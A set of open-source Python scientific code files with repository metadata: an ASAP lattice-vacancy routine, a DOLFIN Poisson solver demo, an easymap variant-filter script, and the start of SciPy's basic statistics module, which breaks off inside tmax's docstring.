self.vacant_neighbors[j][self.neighbor_mapping[i]] = index
self.vacant_coordinations[j] += 1
self.vacant_types[j] = self.get_atom_type(self.vacant_neighbors[j])
vacant_append = False
if vacant_append:
if self.debug:
print ("Adding vacancy %i (%2.2f %2.2f %2.2f)" %
(len(self.vacant_positions),
vacant_position[0],
vacant_position[1],
vacant_position[2]))
self.vacant_positions = np.append(self.vacant_positions,
vacant_position.reshape(1,3),
axis=0)
self.vacant_neighbors = np.append(self.vacant_neighbors,
-np.ones((1,self.neighbor_count), dtype=int),
axis=0)
self.vacant_neighbors[-1][self.neighbor_mapping[i]] = index
self.vacant_coordinations = np.append(self.vacant_coordinations, 1)
self.vacant_types = np.append(self.vacant_types,
self.get_atom_type(self.vacant_neighbors[-1]))
def remove_vacancies(self, index):
"""Removes and updates vacancies associated with the
atom indexed "index". It will only remove vacancies
if they are not associated with other atoms."""
i = 0
end = len(self.vacant_neighbors)
while i < end:
vacant_remove = True
for j, n in enumerate(self.vacant_neighbors[i]):
if n >= 0 and n != index:
vacant_remove = False
if n == index:
self.vacant_neighbors[i][j] = -1
self.vacant_coordinations[i] -= 1
self.vacant_types[i] = self.get_atom_type(self.vacant_neighbors[i])
if vacant_remove:
if self.debug:
position = self.vacant_positions[i]
print ("Removing vacancy %i (%2.2f %2.2f %2.2f)" %
(i, position[0], position[1], position[2]))
end -= 1
self.vacant_positions = np.delete(self.vacant_positions, i, axis=0)
self.vacant_neighbors = np.delete(self.vacant_neighbors, i, axis=0)
self.vacant_coordinations = np.delete(self.vacant_coordinations, i)
self.vacant_types = np.delete(self.vacant_types, i)
else:
i += 1
# Some useful functions
def surface_indexes(self):
"""Returns the indexes for all the surface atoms (coordination < 12)."""
mask = self.coordinations < 12
return np.arange(self.natoms)[mask]
def vacant_indexes(self):
"""Returns the indexes for the vacancies."""
return np.arange(len(self.vacant_positions))
def get_atom_coordination(self, neighbors):
neighbors = np.array(neighbors)
neighbors = neighbors[neighbors >= 0]
return len(neighbors)
def get_atom_type(self, neighbors):
neighbors = np.array(neighbors)
typename = tuple((neighbors >= 0).astype(int))
if typename in self.type_names:
return self.type_data[self.type_numbers[typename]]['type']
else:
return 0
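# get_atom_type() encodes which neighbor sites are occupied as a tuple of 0/1
# flags and looks that pattern up in the lattice data tables; patterns not
# listed there fall back to type 0.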
# Functions to check the neighbor lists and vacancies
def check_neighbors(self):
print(">> Checking the neighbor list...")
positions = self.positions
neighbors = self.neighbors
coordinations = self.coordinations
types = self.types
trouble = False
for i, n in enumerate(neighbors):
for j, m in enumerate(n):
found = False
p1 = positions[i] + self.neighbor_positions[j]
for k, p2 in enumerate(positions):
if (np.abs(p1 - p2) < 1e-3).all():
found = True
if m < 0:
print('Atom %i is missing neighbor atom %i at %s' % (i, k, p2))
trouble = True
elif m != k:
print('Atom %i has atom %i as neighbor instead of atom %i' % (i, m, k))
trouble = True
if m >= 0 and found is False:
trouble = True
print('Atom %i does not have atom %i as neighbor' % (i, m))
if self.get_atom_coordination(n) != coordinations[i]:
trouble = True
print('Atom %i coordination does not match' % i)
if self.get_atom_type(n) != types[i]:
trouble = True
print('Atom %i type does not match' % i)
return trouble
def check_vacancies(self):
print(">> Checking the vacancies...")
vacant_positions = self.vacant_positions
vacant_neighbors = self.vacant_neighbors
positions = self.positions
trouble = False
for i, p1 in enumerate(vacant_positions):
for j, p2 in enumerate(positions):
if (np.abs(p1 - p2) < 1e-3).all():
trouble = True
print("Vacancy %i is identical to atom %i at %s" % (i, j, p1))
for i, n in enumerate(vacant_neighbors):
for j, m in enumerate(n):
p1 = vacant_positions[i] + self.neighbor_positions[j]
for k, p2 in enumerate(positions):
if (np.abs(p1 - p2) < 1e-3).all():
if m < 0:
print('Vacancy %i is missing neighbor atom %i at %s' % (i, k, p2))
trouble = True
elif m != k:
print ('Vacancy %i is having atom %i as ' % (i, m) +
'neighbor instead of atom %i' % k)
trouble = True
return trouble
|
auag92/n2dm
|
Asap-3.8.4/Python/asap3/MonteCarlo/Moves/Surface.py
|
Python
|
mit
| 15,210
|
[
"ASE"
] |
da12e8cb133c89e97195deb708497e08457c7cac951ad99a3bf8da9c2e77c5bf
|
"""This demo program solves Poisson's equation
- div grad u(x, y) = f(x, y)
on the unit square with source f given by
f(x, y) = 10*exp(-((x - 0.5)^2 + (y - 0.5)^2) / 0.02)
and boundary conditions given by
u(x, y) = 0 for x = 0 or x = 1
du/dn(x, y) = sin(5*x) for y = 0 or y = 1
"""
# Copyright (C) 2007-2011 Anders Logg
#
# This file is part of DOLFIN.
#
# DOLFIN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DOLFIN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DOLFIN. If not, see <http://www.gnu.org/licenses/>.
#
# First added: 2007-08-16
# Last changed: 2012-11-12
# Begin demo
from dolfin import *
import scipy.sparse as sps
import scipy.io
import scipy
import pdb
# parameters.linear_algebra_backend = "uBLAS"
# Create mesh and define function space:
mesh = UnitSquareMesh(500, 500)
V = FunctionSpace(mesh, "Lagrange", 1)
# Define Dirichlet boundary (x = 0 or x = 1)
def boundary(x):
return x[0] < DOLFIN_EPS or x[0] > 1.0 - DOLFIN_EPS
# Define boundary condition
u0 = Constant(0.0)
bc = DirichletBC(V, u0, boundary)
# Define variational problem
u = TrialFunction(V)
v = TestFunction(V)
f = Expression("10*exp(-(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)")
g = Expression("sin(5*x[0])")
a = inner(grad(u), grad(v))*dx
L = f*v*dx + g*v*ds
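# a(u, v) is the bilinear form and L(v) the linear form of the weak Poisson
# problem: find u in V, with u = u0 on the Dirichlet boundary, such that
# a(u, v) = L(v) for all test functions v in V.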
print("starting assemble")
A, bb = assemble_system(a, L, bc)
# solver = KrylovSolver("tfqmr", "amg")
# solver.set_operators(A, A)
# Compute solution
u = Function(V)
print("solve")
# solve(A,u.vector(),bb)
set_log_level(PROGRESS)
solver = KrylovSolver("cg")
# solver.parameters["relative_tolerance"] = 1e-10
# solver.parameters["absolute_tolerance"] = 1e-7
solver.solve(A,u.vector(),bb)
set_log_level(PROGRESS)
# problem = VariationalProblem(a, L, bc)
# problem.parameters["linear_solver"] = "gmres"aaa
# problem.parameters["preconditioner"] = "ilu"
# u = problem.solve()
parameters.linear_algebra_backend = "uBLAS"
A, bb = assemble_system(a, L, bc)
print("store matrix")
rows, cols, values = A.data()
# rows1, values1 = bb.data()
Aa = sps.csr_matrix((values, cols, rows))
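# A.data() on the uBLAS backend is unpacked above as (row pointers, column
# indices, values) and reassembled into a scipy CSR matrix, so the assembled
# system can be written to a MATLAB .mat file below.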
# b = sps.csr_matrix((values1, cols1, rows1))
print("save matrix")
scipy.io.savemat("Ab.mat", {"A": Aa, "b":bb.data()},oned_as='row')
# scipy.io.savemat("b.mat", {"b": bb.data()},oned_as='row')
# Save solution in VTK format
# file = File("poisson.pvd")
# file << u
# Plot solution
plot(u, interactive=True)
|
wathen/PhD
|
MHD/FEniCS/Test/demo_poisson.py
|
Python
|
mit
| 2,858
|
[
"VTK"
] |
609b8096b4776b43f3102a23aa07fc531088a90b9a9845f2a8cb5b9b4bace881
|
# This script is used to filter polymorphism data in VA files according to a number of criteria determined by arguments from the workflow.
# The STEP argument is used to distinguish different types of filtering that are needed during the analysis
# STEP = 1: Normal argument-driven filtering
# STEP = 2: Candidate region filtering
# STEP = 3: Initial filtering + eliminates indels from the first VA files + eliminates variants from contigs shorter than 1 MB
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-a', action="store", dest = 'input')
parser.add_argument('-b', action="store", dest = 'output')
parser.add_argument('-fasta', action="store", dest = 'fasta')
parser.add_argument('-chr', action="store", dest = 'chr', default = '*', nargs='+')
parser.add_argument('-mut_type', action="store", dest = 'mut_type', default = 'all') # / EMS
parser.add_argument('-qual_min', action="store", dest = 'qual_min', default = 0)
parser.add_argument('-dp_min', action="store", dest = 'dp_min', default = 0)
parser.add_argument('-dp_max', action="store", dest = 'dp_max', default = 8000)
parser.add_argument('-af_min', action="store", dest = 'af_min', default = 0)
parser.add_argument('-af_max', action="store", dest = 'af_max', default = 2)
parser.add_argument('-pos_min', action="store", dest = 'pos_min', default = 0)
parser.add_argument('-pos_max', action="store", dest = 'pos_max', default = 1000000000)
parser.add_argument('-step', action="store", dest = 'step')
parser.add_argument('-cand_reg_file', action="store", dest = 'cand_reg_file')
args = parser.parse_args()
#Input
input = args.input
f1 = open(input, 'r')
lines = f1.readlines()
#Output
output = args.output
f2 = open(output, 'w')
step = args.step
#_________________________________CANDIDATE REGION FILTER___________________________________________________________________________________
if step == '1':
pass
elif step == '2':
f3 = open(args.cand_reg_file, 'r')
f3lines = f3.readlines()
for i, line in enumerate(f3lines):
if line.startswith('?'):
sp = line.split()
args.chr = sp[1].strip('>')
args.pos_min = int(sp[2].strip())
args.pos_max = int(sp[3].strip())
#__________________________________________________________________________________________________________________________________________
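# limits() reads the split variant record from the global `sp` set by the
# calling loop, applies the position, quality, read-depth and allele-frequency
# cut-offs taken from the command-line arguments, and stores the outcome in
# the global flag `selector` (1 = keep the line, 0 = discard it).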
def limits():
global selector
selector = 0
if (
(int(args.pos_min) < int(sp[1].strip()) < int(args.pos_max))
and float(sp[4].strip()) > float(args.qual_min)
and int(args.dp_min) < (int(sp[6].strip()) + int(sp[5].strip())) < int(args.dp_max)
and float(args.af_min) < ((float(sp[6].strip())/ ((float(sp[6].strip())) + (float(sp[5].strip()))))) < float(args.af_max)
):
selector = 1
else:
selector = 0
return [selector]
#__________________________________________________________________________________________________________________________________________
chromosome = args.chr
if step == '1' or step == '2':
for i, line in enumerate(lines):
if not line.startswith('#'):
sp = line.split('\t')
if args.mut_type.strip() == 'EMS' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
ref_b = sp[2]
alt_b = sp[3]
if (
(selector == 1)
and ((ref_b.strip() == 'G' and alt_b.strip() == 'A')
or (ref_b.strip() == 'C' and alt_b.strip() == 'T'))
):
f2.write(line)
elif args.mut_type.strip() == 'all' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
if selector == 1:
f2.write(line)
f2.close()
if step == '3':
# Function to parse fasta file (based on one of the Biopython IOs)
def read_fasta(fp):
name, seq = None, []
for line in fp:
line = line.rstrip()
if line.startswith('>'):
if name: yield (name, ''.join(seq))
name, seq = line, []
else:
seq.append(line)
if name: yield (name, ''.join(seq))
# Read contig fasta file
contig_lengths = list()
contig_source = args.fasta
with open(contig_source) as fp:
fastalist = list()
for name_contig, seq_contig in read_fasta(fp):
innerlist = list()
innerlist.append(name_contig.strip('>'))
innerlist.append(len(seq_contig))
fastalist.append(innerlist)
large_contigs = list()
for contig in fastalist:
if int(contig[1]) > 1000000:
large_contigs.append(contig[0])
# Filter
for i, line in enumerate(lines):
if not line.startswith('#'):
sp = line.split('\t')
if len(sp[2].strip()) == 1 and len(sp[3].strip()) == 1:
if str(sp[0]).strip() in large_contigs:
if args.mut_type.strip() == 'EMS' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
ref_b = sp[2]
alt_b = sp[3]
if (
(selector == 1)
and ((ref_b.strip() == 'G' and alt_b.strip() == 'A')
or (ref_b.strip() == 'C' and alt_b.strip() == 'T'))
):
f2.write(line)
elif args.mut_type.strip() == 'all' and ((str(sp[0].strip()) in chromosome) or (chromosome[0] == '*')):
limits()
if selector == 1:
f2.write(line)
f2.close()
|
davidwilson-85/easymap
|
scripts_snp/variants-filter.py
|
Python
|
gpl-3.0
| 5,099
|
[
"Biopython"
] |
2f8e49f089d0b0a1a41d9f5dd105d475f98a0d0e3af3c893dfcc406418b2653a
|
# Copyright 2002 Gary Strangman. All rights reserved
# Copyright 2002-2016 The SciPy Developers
#
# The original code from Gary Strangman was heavily adapted for
# use in SciPy by Travis Oliphant. The original code came with the
# following disclaimer:
#
# This software is provided "as-is". There are no expressed or implied
# warranties of any kind, including, but not limited to, the warranties
# of merchantability and fitness for a given application. In no event
# shall Gary Strangman be liable for any direct, indirect, incidental,
# special, exemplary or consequential damages (including, but not limited
# to, loss of use, data or profits, or business interruption) however
# caused and on any theory of liability, whether in contract, strict
# liability or tort (including negligence or otherwise) arising in any way
# out of the use of this software, even if advised of the possibility of
# such damage.
"""
A collection of basic statistical functions for Python.
References
----------
.. [CRCProbStat2000] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
"""
import warnings
import math
from math import gcd
from collections import namedtuple
import numpy as np
from numpy import array, asarray, ma
from numpy.lib import NumpyVersion
from scipy.spatial.distance import cdist
from scipy.ndimage import _measurements
from scipy._lib._util import (check_random_state, MapWrapper,
rng_integers, float_factorial)
import scipy.special as special
from scipy import linalg
from . import distributions
from . import _mstats_basic as mstats_basic
from ._stats_mstats_common import (_find_repeats, linregress, theilslopes,
siegelslopes)
from ._stats import (_kendall_dis, _toint64, _weightedrankedtau,
_local_correlations)
from dataclasses import make_dataclass
from ._hypotests import _all_partitions
from ._hypotests_pythran import _compute_outer_prob_inside_method
from ._axis_nan_policy import (_axis_nan_policy_factory,
_broadcast_concatenate)
# Functions/classes in other files should be added in `__init__.py`, not here
__all__ = ['find_repeats', 'gmean', 'hmean', 'mode', 'tmean', 'tvar',
'tmin', 'tmax', 'tstd', 'tsem', 'moment',
'skew', 'kurtosis', 'describe', 'skewtest', 'kurtosistest',
'normaltest', 'jarque_bera', 'itemfreq',
'scoreatpercentile', 'percentileofscore',
'cumfreq', 'relfreq', 'obrientransform',
'sem', 'zmap', 'zscore', 'gzscore', 'iqr', 'gstd',
'median_absolute_deviation', 'median_abs_deviation',
'sigmaclip', 'trimboth', 'trim1', 'trim_mean',
'f_oneway', 'F_onewayConstantInputWarning',
'F_onewayBadInputSizesWarning',
'PearsonRConstantInputWarning', 'PearsonRNearConstantInputWarning',
'pearsonr', 'fisher_exact',
'SpearmanRConstantInputWarning', 'spearmanr', 'pointbiserialr',
'kendalltau', 'weightedtau', 'multiscale_graphcorr',
'linregress', 'siegelslopes', 'theilslopes', 'ttest_1samp',
'ttest_ind', 'ttest_ind_from_stats', 'ttest_rel',
'kstest', 'ks_1samp', 'ks_2samp',
'chisquare', 'power_divergence',
'tiecorrect', 'ranksums', 'kruskal', 'friedmanchisquare',
'rankdata',
'combine_pvalues', 'wasserstein_distance', 'energy_distance',
'brunnermunzel', 'alexandergovern']
def _contains_nan(a, nan_policy='propagate'):
policies = ['propagate', 'raise', 'omit']
if nan_policy not in policies:
raise ValueError("nan_policy must be one of {%s}" %
', '.join("'%s'" % s for s in policies))
try:
# Calling np.sum to avoid creating a huge array into memory
# e.g. np.isnan(a).any()
with np.errstate(invalid='ignore', over='ignore'):
contains_nan = np.isnan(np.sum(a))
except TypeError:
# This can happen when attempting to sum things which are not
# numbers (e.g. as in the function `mode`). Try an alternative method:
try:
contains_nan = np.nan in set(a.ravel())
except TypeError:
# Don't know what to do. Fall back to omitting nan values and
# issue a warning.
contains_nan = False
nan_policy = 'omit'
warnings.warn("The input array could not be properly "
"checked for nan values. nan values "
"will be ignored.", RuntimeWarning)
if contains_nan and nan_policy == 'raise':
raise ValueError("The input contains nan values")
return contains_nan, nan_policy
def _chk_asarray(a, axis):
if axis is None:
a = np.ravel(a)
outaxis = 0
else:
a = np.asarray(a)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
return a, outaxis
def _chk2_asarray(a, b, axis):
if axis is None:
a = np.ravel(a)
b = np.ravel(b)
outaxis = 0
else:
a = np.asarray(a)
b = np.asarray(b)
outaxis = axis
if a.ndim == 0:
a = np.atleast_1d(a)
if b.ndim == 0:
b = np.atleast_1d(b)
return a, b, outaxis
def _shape_with_dropped_axis(a, axis):
"""
Given an array `a` and an integer `axis`, return the shape
of `a` with the `axis` dimension removed.
Examples
--------
>>> a = np.zeros((3, 5, 2))
>>> _shape_with_dropped_axis(a, 1)
(3, 2)
"""
shp = list(a.shape)
try:
del shp[axis]
except IndexError:
raise np.AxisError(axis, a.ndim) from None
return tuple(shp)
def _broadcast_shapes(shape1, shape2):
"""
Given two shapes (i.e. tuples of integers), return the shape
that would result from broadcasting two arrays with the given
shapes.
Examples
--------
>>> _broadcast_shapes((2, 1), (4, 1, 3))
(4, 2, 3)
"""
d = len(shape1) - len(shape2)
if d <= 0:
shp1 = (1,)*(-d) + shape1
shp2 = shape2
else:
shp1 = shape1
shp2 = (1,)*d + shape2
shape = []
for n1, n2 in zip(shp1, shp2):
if n1 == 1:
n = n2
elif n2 == 1 or n1 == n2:
n = n1
else:
raise ValueError(f'shapes {shape1} and {shape2} could not be '
'broadcast together')
shape.append(n)
return tuple(shape)
def _broadcast_shapes_with_dropped_axis(a, b, axis):
"""
Given two arrays `a` and `b` and an integer `axis`, find the
shape of the broadcast result after dropping `axis` from the
shapes of `a` and `b`.
Examples
--------
>>> a = np.zeros((5, 2, 1))
>>> b = np.zeros((1, 9, 3))
>>> _broadcast_shapes_with_dropped_axis(a, b, 1)
(5, 3)
"""
shp1 = _shape_with_dropped_axis(a, axis)
shp2 = _shape_with_dropped_axis(b, axis)
try:
shp = _broadcast_shapes(shp1, shp2)
except ValueError:
raise ValueError(f'non-axis shapes {shp1} and {shp2} could not be '
'broadcast together') from None
return shp
# note that `weights` are paired with `x`
@_axis_nan_policy_factory(
lambda x: x, n_samples=1, n_outputs=1, too_small=0, paired=True,
result_unpacker=lambda x: (x,), kwd_samples=['weights'])
def gmean(a, axis=0, dtype=None, weights=None):
r"""Compute the weighted geometric mean along the specified axis.
The weighted geometric mean of the array :math:`a_i` associated to weights
:math:`w_i` is:
.. math::
\exp \left( \frac{ \sum_{i=1}^n w_i \ln a_i }{ \sum_{i=1}^n w_i }
\right) \, ,
and, with equal weights, it gives:
.. math::
\sqrt[n]{ \prod_{i=1}^n a_i } \, .
Parameters
----------
a : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the geometric mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If dtype is not specified, it defaults to the
dtype of a, unless a has an integer dtype with a precision less than
that of the default platform integer. In that case, the default
platform integer is used.
weights : array_like, optional
The `weights` array must be broadcastable to the same shape as `a`.
Default is None, which gives each value a weight of 1.0.
Returns
-------
gmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
hmean : Harmonic mean
Notes
-----
The geometric average is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
References
----------
.. [1] "Weighted Geometric Mean", *Wikipedia*,
https://en.wikipedia.org/wiki/Weighted_geometric_mean.
Examples
--------
>>> from scipy.stats import gmean
>>> gmean([1, 4])
2.0
>>> gmean([1, 2, 3, 4, 5, 6, 7])
3.3800151591412964
>>> gmean([1, 4, 7], weights=[3, 1, 3])
2.80668351922014
"""
if not isinstance(a, np.ndarray):
# if not an ndarray object attempt to convert it
log_a = np.log(np.array(a, dtype=dtype))
elif dtype:
# Must change the default dtype allowing array type
if isinstance(a, np.ma.MaskedArray):
log_a = np.log(np.ma.asarray(a, dtype=dtype))
else:
log_a = np.log(np.asarray(a, dtype=dtype))
else:
log_a = np.log(a)
if weights is not None:
weights = np.asanyarray(weights, dtype=dtype)
return np.exp(np.average(log_a, axis=axis, weights=weights))
@_axis_nan_policy_factory(
lambda x: x, n_samples=1, n_outputs=1, too_small=0, paired=True,
result_unpacker=lambda x: (x,), kwd_samples=['weights'])
def hmean(a, axis=0, dtype=None, *, weights=None):
r"""Calculate the weighted harmonic mean along the specified axis.
The weighted harmonic mean of the array :math:`a_i` associated to weights
:math:`w_i` is:
.. math::
\frac{ \sum_{i=1}^n w_i }{ \sum_{i=1}^n \frac{w_i}{a_i} } \, ,
and, with equal weights, it gives:
.. math::
\frac{ n }{ \sum_{i=1}^n \frac{1}{a_i} } \, .
Parameters
----------
a : array_like
Input array, masked array or object that can be converted to an array.
axis : int or None, optional
Axis along which the harmonic mean is computed. Default is 0.
If None, compute over the whole array `a`.
dtype : dtype, optional
Type of the returned array and of the accumulator in which the
elements are summed. If `dtype` is not specified, it defaults to the
dtype of `a`, unless `a` has an integer `dtype` with a precision less
than that of the default platform integer. In that case, the default
platform integer is used.
weights : array_like, optional
The weights array can either be 1-D (in which case its length must be
the size of `a` along the given `axis`) or of the same shape as `a`.
Default is None, which gives each value a weight of 1.0.
.. versionadded:: 1.9
Returns
-------
hmean : ndarray
See `dtype` parameter above.
See Also
--------
numpy.mean : Arithmetic average
numpy.average : Weighted average
gmean : Geometric mean
Notes
-----
The harmonic mean is computed over a single dimension of the input
array, axis=0 by default, or all values in the array if axis=None.
float64 intermediate and return values are used for integer inputs.
References
----------
.. [1] "Weighted Harmonic Mean", *Wikipedia*,
https://en.wikipedia.org/wiki/Harmonic_mean#Weighted_harmonic_mean
.. [2] Ferger, F., "The nature and use of the harmonic mean", Journal of
the American Statistical Association, vol. 26, pp. 36-40, 1931
Examples
--------
>>> from scipy.stats import hmean
>>> hmean([1, 4])
1.6000000000000001
>>> hmean([1, 2, 3, 4, 5, 6, 7])
2.6997245179063363
>>> hmean([1, 4, 7], weights=[3, 1, 3])
1.9029126213592233
"""
if not isinstance(a, np.ndarray):
a = np.array(a, dtype=dtype)
elif dtype:
# Must change the default dtype allowing array type
if isinstance(a, np.ma.MaskedArray):
a = np.ma.asarray(a, dtype=dtype)
else:
a = np.asarray(a, dtype=dtype)
if np.all(a >= 0):
# Harmonic mean only defined if greater than or equal to zero.
if weights is not None:
weights = np.asanyarray(weights, dtype=dtype)
with np.errstate(divide='ignore'):
return 1.0 / np.average(1.0 / a, axis=axis, weights=weights)
else:
raise ValueError("Harmonic mean only defined if all elements greater "
"than or equal to zero")
ModeResult = namedtuple('ModeResult', ('mode', 'count'))
def mode(a, axis=0, nan_policy='propagate'):
"""Return an array of the modal (most common) value in the passed array.
If there is more than one such value, only the smallest is returned.
The bin-count for the modal bins is also returned.
Parameters
----------
a : array_like
n-dimensional array of which to find mode(s).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mode : ndarray
Array of modal values.
count : ndarray
Array of counts for each mode.
Examples
--------
>>> a = np.array([[6, 8, 3, 0],
... [3, 2, 1, 7],
... [8, 1, 8, 4],
... [5, 3, 0, 5],
... [4, 7, 5, 9]])
>>> from scipy import stats
>>> stats.mode(a)
ModeResult(mode=array([[3, 1, 0, 0]]), count=array([[1, 1, 1, 1]]))
To get mode of whole array, specify ``axis=None``:
>>> stats.mode(a, axis=None)
ModeResult(mode=array([3]), count=array([3]))
"""
a, axis = _chk_asarray(a, axis)
if a.size == 0:
return ModeResult(np.array([]), np.array([]))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.mode(a, axis)
if a.dtype == object and np.nan in set(a.ravel()):
# Fall back to a slower method since np.unique does not work with NaN
scores = set(np.ravel(a)) # get ALL unique values
testshape = list(a.shape)
testshape[axis] = 1
oldmostfreq = np.zeros(testshape, dtype=a.dtype)
oldcounts = np.zeros(testshape, dtype=int)
for score in scores:
template = (a == score)
counts = np.sum(template, axis, keepdims=True)
mostfrequent = np.where(counts > oldcounts, score, oldmostfreq)
oldcounts = np.maximum(counts, oldcounts)
oldmostfreq = mostfrequent
return ModeResult(mostfrequent, oldcounts)
def _mode1D(a):
vals, cnts = np.unique(a, return_counts=True)
return vals[cnts.argmax()], cnts.max()
# np.apply_along_axis will convert the _mode1D tuples to a numpy array,
# casting types in the process.
# This recreates the results without that issue
# View of a, rotated so the requested axis is last
a_view = np.moveaxis(a, axis, -1)
inds = np.ndindex(a_view.shape[:-1])
modes = np.empty(a_view.shape[:-1], dtype=a.dtype)
counts = np.empty(a_view.shape[:-1], dtype=np.int_)
for ind in inds:
modes[ind], counts[ind] = _mode1D(a_view[ind])
newshape = list(a.shape)
newshape[axis] = 1
return ModeResult(modes.reshape(newshape), counts.reshape(newshape))
def _mask_to_limits(a, limits, inclusive):
"""Mask an array for values outside of given limits.
This is primarily a utility function.
Parameters
----------
a : array
limits : (float or None, float or None)
A tuple consisting of the (lower limit, upper limit). Values in the
input array less than the lower limit or greater than the upper limit
will be masked out. None implies no limit.
inclusive : (bool, bool)
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to lower or upper are allowed.
Returns
-------
A MaskedArray.
Raises
------
A ValueError if there are no values within the given limits.
"""
lower_limit, upper_limit = limits
lower_include, upper_include = inclusive
am = ma.MaskedArray(a)
if lower_limit is not None:
if lower_include:
am = ma.masked_less(am, lower_limit)
else:
am = ma.masked_less_equal(am, lower_limit)
if upper_limit is not None:
if upper_include:
am = ma.masked_greater(am, upper_limit)
else:
am = ma.masked_greater_equal(am, upper_limit)
if am.count() == 0:
raise ValueError("No array values within given limits")
return am
def tmean(a, limits=None, inclusive=(True, True), axis=None):
"""Compute the trimmed mean.
This function finds the arithmetic mean of given values, ignoring values
outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None (default), then all
values are used. Either of the limit values in the tuple can also be
None representing a half-open interval.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to compute test. Default is None.
Returns
-------
tmean : ndarray
Trimmed mean.
See Also
--------
trim_mean : Returns mean after trimming a proportion from both tails.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmean(x)
9.5
>>> stats.tmean(x, (3,17))
10.0
"""
a = asarray(a)
if limits is None:
return np.mean(a, axis)
am = _mask_to_limits(a, limits, inclusive)
mean = np.ma.filled(am.mean(axis=axis), fill_value=np.nan)
return mean if mean.ndim > 0 else mean.item()
def tvar(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""Compute the trimmed variance.
This function computes the sample variance of an array of values,
while ignoring values which are outside of given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tvar : float
Trimmed variance.
Notes
-----
`tvar` computes the unbiased sample variance, i.e. it uses a correction
factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tvar(x)
35.0
>>> stats.tvar(x, (3,17))
20.0
"""
a = asarray(a)
a = a.astype(float)
if limits is None:
return a.var(ddof=ddof, axis=axis)
am = _mask_to_limits(a, limits, inclusive)
amnan = am.filled(fill_value=np.nan)
return np.nanvar(amnan, ddof=ddof, axis=axis)
def tmin(a, lowerlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""Compute the trimmed minimum.
This function finds the minimum value of an array `a` along the
specified axis, but only considering values greater than a specified
lower limit.
Parameters
----------
a : array_like
Array of values.
lowerlimit : None or float, optional
Values in the input array less than the given limit will be ignored.
When lowerlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the lower limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmin : float, int or ndarray
Trimmed minimum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tmin(x)
0
>>> stats.tmin(x, 13)
13
>>> stats.tmin(x, 13, inclusive=False)
14
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (lowerlimit, None), (inclusive, False))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.minimum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tmax(a, upperlimit=None, axis=0, inclusive=True, nan_policy='propagate'):
"""Compute the trimmed maximum.
This function computes the maximum value of an array along a given axis,
while ignoring values larger than a specified upper limit.
Parameters
----------
a : array_like
Array of values.
upperlimit : None or float, optional
Values in the input array greater than the given limit will be ignored.
When upperlimit is None, then all values are used. The default value
is None.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
inclusive : {True, False}, optional
This flag determines whether values exactly equal to the upper limit
are included. The default value is True.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
tmax : float, int or ndarray
Trimmed maximum.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
